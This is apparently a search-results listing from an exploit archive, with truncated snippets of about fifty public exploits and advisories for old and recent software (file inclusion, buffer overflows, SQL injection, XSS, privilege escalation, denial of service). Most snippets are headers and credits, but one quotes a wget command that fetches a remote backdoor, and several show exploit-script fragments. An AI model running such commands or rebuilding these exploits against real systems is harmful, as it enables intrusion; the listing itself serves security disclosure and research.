41207 matches found
Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation (1)
Solaris 10 libnspr - LDPRELOAD Arbitrary File Creation Privilege Escalation 1 !/bin/sh $Id: raptorlibnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $ raptorlibnspr - Solaris 10 libnspr oldschool local root Copyright c 2006 Marco Ivaldi Local exploitation of a design error vulnerability in version 4.6....
n@board 3.1.9e - naboard_pnr.php Remote File Inclusion
n@board 3.1.9e - naboardpnr.php Remote File Inclusion n@board v3.1.9e, 3.1.8cgb ,3.1.8tc skin Remote File Include Vulnerability Turkish Hacker's Discovered By : mdx and TheBatHacker ------------------------------------------------------ Cyber-Warrior TIM Ay ve Y.ld.zlar Geceye Yak...r... the moon...
phpQuiz 0.1 - pagename Remote File Inclusion
phpQuiz 0.1 - pagename Remote File Inclusion SolpotCrew Community phpQuiz v0.01 design and coding byJule Slootbeek pagename Remote File Inclusion Download file : http://www.furor-normannicus.de/phpQuiz/download/phpQuiz.zip Bug Found By :Solpot a.k.a k. Hasibuan 14-09-2006 contact:...
phpBB Shadow Premod 2.7.1 - Remote File Inclusion
phpBB Shadow Premod 2.7.1 - Remote File Inclusion --------------------------------------------------------------------------- Shadow Prémod = 2.7.1 phpbbrootpath Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn...
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow 1 29\08\06 There are doors I have yet to open, windows I have yet to look through. Going forward may not be...
Integramod Portal 2.x - functions_portal.php Remote File Inclusion
Integramod Portal 2.x - functionsportal.php Remote File Inclusion !/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=47 Integramod Portal Copyright...
Fantastic News 2.1.3 - script_path Remote File Inclusion
Fantastic News 2.1.3 - scriptpath Remote File Inclusion ============================================================================================== Fantastic News = v2.1.3 CONFIGscriptpath Remote File Inclusion Exploit...
Cheese Tracker 0.9.9 - Local Buffer Overflow
Cheese Tracker 0.9.9 - Local Buffer Overflow / by Luigi Auriemma / include include include include define VER "0.1" define CPOS 243 // reader.getfilepos-pcpos define JUNKSZ 500 + CPOS // Uint8 junkbuster500 define OVERFLOW 740 // overflow define BOFSZNUM JUNKSZ + OVERFLOW define BOFSZ JUNKSZ +...
Sendmail 8.13.5 - Remote Signal Handling (PoC)
Sendmail 8.13.5 - Remote Signal Handling PoC !/usr/bin/env python [email protected] Sendmail 8.13.5 and below Remote Signal Handling exploit usage: rbl4ck-sendmail.py 127.0.0.1 0 25 this exploit was leaked to the PHC Phrack High Council so instead of only letting them have a copy, we figu...
RsGallery2 1.11.2 - rsgallery.html.php File Inclusion
RsGallery2 1.11.2 - rsgallery.html.php File Inclusion RsGallery2 for Joomla --------------------------------------------------------------------------- Discovered: marriottvn Remote : Yes Level : High --------------------------------------------------------------------------- Affected software...
Fenice Oms 1.10 - GET Remote Buffer Overflow
Fenice Oms 1.10 - GET Remote Buffer Overflow / IHS Iran Homeland Security public source code Fenice - Open Media Streaming Server remote BOF exploit author : c0d3r "kaveh razavi" [email protected] package : fenice-1.10.tar.gz and prolly prior versions workaround : update after patch release...
Linux Kernel 2.6.9 2.6.11 (RHEL 4) - SYS_EPoll_Wait Local Integer Overflow Local Privilege Escalation
Linux Kernel 2.6.9 2.6.11 RHEL 4 - SYSEPollWait Local Integer Overflow Local Privilege Escalation / k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 Discovered and original exploit coded Jan 2005 by sd Modified 2005/9 by alert7 XFOCUS Security Team http://www.xfocus.org gcc -o k-ra...
Eudora Qualcomm WorldMail 3.0 - IMAPd Remote Overflow
Eudora Qualcomm WorldMail 3.0 - IMAPd Remote Overflow !/usr/bin/python PRE AUTHENTICATION Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow. Discovered by Tim Shelton - [email protected] Coded by [email protected] Details: SEH gets overwritten at 970 bytes in the LIS...
PHPX 3.5.x - Admin login.php SQL Injection
PHPX 3.5.x - Admin login.php SQL Injection source: https://www.securityfocus.com/bid/15680/info PHPX is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation coul...
Noahs Classifieds 1.3 - index.php Cross-Site Scripting
Noahs Classifieds 1.3 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/14835/info Noah's Classifieds is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage thi...
Webhints 1.03 - Remote Command Execution (Perl) (1)
Webhints 1.03 - Remote Command Execution Perl 1 This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR:...
MidiCart PHP - Item_List.php?SecondGroup SQL Injection
MidiCart PHP - ItemList.php?SecondGroup SQL Injection source: https://www.securityfocus.com/bid/13514/info MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacke...
CA License Server - GETCONFIG Remote Buffer Overflow
CA License Server - GETCONFIG Remote Buffer Overflow / Computer-Associates, License Service Stack Overflow Homepage: ca.com Affected version: v1.61 and below in eTrust, Unicenter, BrightStor, etc.. Patched version: hotfix Link: ca.com Date: 04 March 2005 Application Risk: Tsunami Internet Risk:...
Star Wars Battlefront 1.1 - Fake Players Denial of Service
Star Wars Battlefront 1.1 - Fake Players Denial of Service / Copyright 2004 Luigi Auriemma This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at...
U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service
U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service source: https://www.securityfocus.com/bid/10840/info The USR808054 wireless access point is reported to contain a denial of service vulnerability in its embedded web server. When malicious requests are received b...
PostNuke 0.726 Phoenix - Multiple Vulnerabilities
PostNuke 0.726 Phoenix - Multiple Vulnerabilities PostNuke Multiple Vulnerabilities Vendor: PostNuke Product: PostNuke Version: CODE VLID = Should be the valid id number of a file for download. CODE = Any script or HTML etc. Solution: An update has been released regarding the SQL Injection...
Microsoft WordPerfect Document Converter (Windows NT4 Workstation SP5SP6 French) - File Template Buffer Overflow (MS03-036)
Microsoft WordPerfect Document Converter Windows NT4 Workstation SP5SP6 French - File Template Buffer Overflow MS03-036 // / Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036 / / / / Exploit with several targets / / / / Find your own return address with : / / findhex dllna...
Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error (4)
Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error 4 // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...
Apache 1.x2.0.x - Chunked-Encoding Memory Corruption (1)
Apache 1.x2.0.x - Chunked-Encoding Memory Corruption 1 // source: https://www.securityfocus.com/bid/5033/info When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper signed interpretatio...
SuSE Linux 6.47.07.17.2 Berkeley Parallel Make - Local Buffer Overflow
SuSE Linux 6.47.07.17.2 Berkeley Parallel Make - Local Buffer Overflow // source: https://www.securityfocus.com/bid/3573/info Parallel Make pmake is a freely available version of the make program, originally distributed with Berkeley Unix. It is designed to execute Makefiles and build programs...
HP-UX 11.0 - SWVerify Buffer Overflow
HP-UX 11.0 - SWVerify Buffer Overflow // source: https://www.securityfocus.com/bid/3279/info HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems. A problem has been discovered in the...
Microsoft Internet Explorer 345 Netscape Communicator 4 - IMG Tag Denial of Service
Microsoft Internet Explorer 345 Netscape Communicator 4 - IMG Tag Denial of Service source: https://www.securityfocus.com/bid/3122/info An issue which affects users of multiple web browsers on Microsoft Windows platforms has been discovered. Multiple malicious IMG tags may cause a denial of...
Solaris 78 - kcms_configure Command-Line Buffer Overflow (2)
Solaris 78 - kcmsconfigure Command-Line Buffer Overflow 2 // source: https://www.securityfocus.com/bid/2558/info The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcmsconfigure, a part of KCMS, is vulnerable to a buffer overflow...
Cisco IOS 11.x12.x - HTTP %%
Cisco IOS 11.x12.x - HTTP %% source: https://www.securityfocus.com/bid/1154/info A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user c...
FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service (5)
FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service 5 / source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and...
ATutor 2.2.4 - id SQL Injection
ATutor 2.2.4 - id SQL Injection Exploit Title: ATutor 2.2.4 - 'id' SQL Injection Date: 2020-02-23 Exploit Author: Andrey Stoykov Vendor Homepage: https://atutor.github.io/ Software Link: https://sourceforge.net/projects/atutor/files/latest/download Version: ATutor 2.2.4 Tested on: LAMP on Ubuntu...
ExpertGPS 6.38 - XML External Entity Injection
ExpertGPS 6.38 - XML External Entity Injection + Exploit Title: ExpertGPS 6.38 - XML External Entity Injection + Date: 2019-12-07 + Exploit Author: Trent Gordon + Vendor Homepage: https://www.topografix.com/ + Software Link: http://download.expertgps.com/SetupExpertGPS.exe + Disclosed at: 7FEB202...
Online Job Portal 1.0 - user_email SQL Injection
Online Job Portal 1.0 - useremail SQL Injection Exploit Title: Online Job Portal 1.0 - 'useremail' SQL Injection Dork: N/A Date: 2020-02-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html Software Link:...
piSignage 2.6.4 - Directory Traversal
piSignage 2.6.4 - Directory Traversal Exploit Title: piSignage 2.6.4 - Directory Traversal Date: 2019-11-13 Exploit Author: JunYeong Ko Vendor Homepage: https://pisignage.com/ Version: piSignage before 2.6.4 Tested on: piSignage before 2.6.4 CVE : CVE-2019-20354 Summary: The web application...
Small CRM 2.0 - Authentication Bypass
Small CRM 2.0 - Authentication Bypass Exploit Title: Small CRM 2.0 - Authentication Bypass Google Dork: N/A Date: 2020-01-02 Exploit Author: FULLSHADE Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/small-crm-php/ Version: V2.0 Tested on: Windows CVE : N/A...
FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)
FTPGetter Professional 5.97.0.223 - Denial of Service PoC Exploit Title: FTPGetter Professional 5.97.0.223 - Denial of Service PoC Google Dork: N/A Date: 2020-01-03 Exploit Author: FULLSHADE Vendor Homepage: https://www.ftpgetter.com/ Software Link: https://www.ftpgetter.com/ftpgetterprosetup.exe...
NextVPN v4.10 - Insecure File Permissions
NextVPN v4.10 - Insecure File Permissions Exploit Title: NextVPN v4.10 - Insecure File Permissions Date: 2019-12-23 Exploit Author: SajjadBnd Contact: [email protected] Vendor Homepage: https://vm3max.site Software Link:http://dl.spacevm.com/NextVPNSetup-v4.10.exe Version: 4.10 Tested on: Win10...
AVE DOMINAplus 1.10.x - Credential Disclosure
AVE DOMINAplus 1.10.x - Credential Disclosure Exploit: AVE DOMINAplus 1.10.x - Credential Disclosure Date: 2019-12-30 Author: LiquidWorm Vendor: AVE S.p.A. Product web page: https://www.ave.it | https://www.domoticaplus.it Affected version: Web Server Code 53AB-WBS - 1.10.62 Advisory ID:...
FreeSWITCH 1.10.1 - Command Execution
FreeSWITCH 1.10.1 - Command Execution Exploit Title: FreeSWITCH 1.10.1 - Command Execution Date: 2019-12-19 Exploit Author: 1F98D Vendor Homepage: https://freeswitch.com/ Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi Version: 1.10.1 Tested on:...
Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution
Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution Exploit Title: Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution Google Dork: N/A Date: 2019-12-06 Exploit Author: Hodorsec Vendor Homepage: http://www.yachtcontrol.nl/en/ Version: 1.0 Software Link:...
Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting
Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting Exploit Title : Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting Exploit Author : omurugur Software link: https://www.oracle.com/tr/applications/siebel/ Effective version : Oracle Siebel Sales 8.1 CVE: N/A Examples Request; POST...
Verot 2.0.3 - Remote Code Execution
Verot 2.0.3 - Remote Code Execution Exploit Title: Verot 2.0.3 - Remote Code Execution Date: 2019-12-05 Exploit Author: Jinny Ramsmark Vendor Homepage: https://www.verot.net/phpclassupload.htm Software Link: https://github.com/verot/class.upload.php Version: '; $quality = "85"; $baseurl =...
ipPulse 1.92 - Enter Key Denial of Service (PoC)
ipPulse 1.92 - Enter Key Denial of Service PoC Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service PoC Discovery by: Diego Buztamante Discovery Date: 2019-11-18 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link : http://download.netscantools.com/ipls192.zip Test...
Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)
Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow SEH Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow SEH Date: 2019-11-09 Exploit Author: Samir sanchez garnica @sasaga92 Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ecidx1=P610 Softwar...
iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address
iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address During processing of incoming iMessages, attacker controlled data is deserialized using the NSUnarchiver API. One of the classes that is allowed to be decoded from the incoming data is NSDictionary...
Alps HID Monitor Service 8.1.0.10 - ApHidMonitorService Unquote Service Path
Alps HID Monitor Service 8.1.0.10 - ApHidMonitorService Unquote Service Path Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path Date: 2019-11-07 Exploit Author: Héctor Gabriel Chimecatl Hernández Vendor Homepage: https://www.alps.com/e/ Software Link:...
Joomla! 3.4.6 - Remote Code Execution
Joomla! 3.4.6 - Remote Code Execution Exploit Title: Joomla! 3.4.6 - Remote Code Execution Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo Vendor Homepage: https//www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0.0 -- 3.4.6 Tested on:...
X.Org X Server 1.20.4 - Local Stack Overflow
X.Org X Server 1.20.4 - Local Stack Overflow Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow Date: 2019-10-16 Exploit Author: Marcelo Vázquez aka s4vitar Vendor Homepage: https://www.x.org/ Version: = 1.20.4 Tested on: Linux CVE: CVE-2019-17624 !/usr/bin/python coding: utf-8 Author:...
TP-Link TL-WR1043ND 2 - Authentication Bypass
TP-Link TL-WR1043ND 2 - Authentication Bypass Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass Date: 2019-06-20 Exploit Author: Uriel Kosayev Vendor Homepage: https://www.tp-link.com Version: TL-WR1043ND V2 Tested on: TL-WR1043ND V2 CVE : CVE-2019-6971 CVE Link:...
Subrion 4.2.1 - Email Persistant Cross-Site Scripting
Subrion 4.2.1 - Email Persistant Cross-Site Scripting Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting Date: 2019-10-07 Author: Min Ko Ko Creatigon Vendor Homepage: https://subrion.org/ CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225 Website : https://l33thacker.com Descriptio...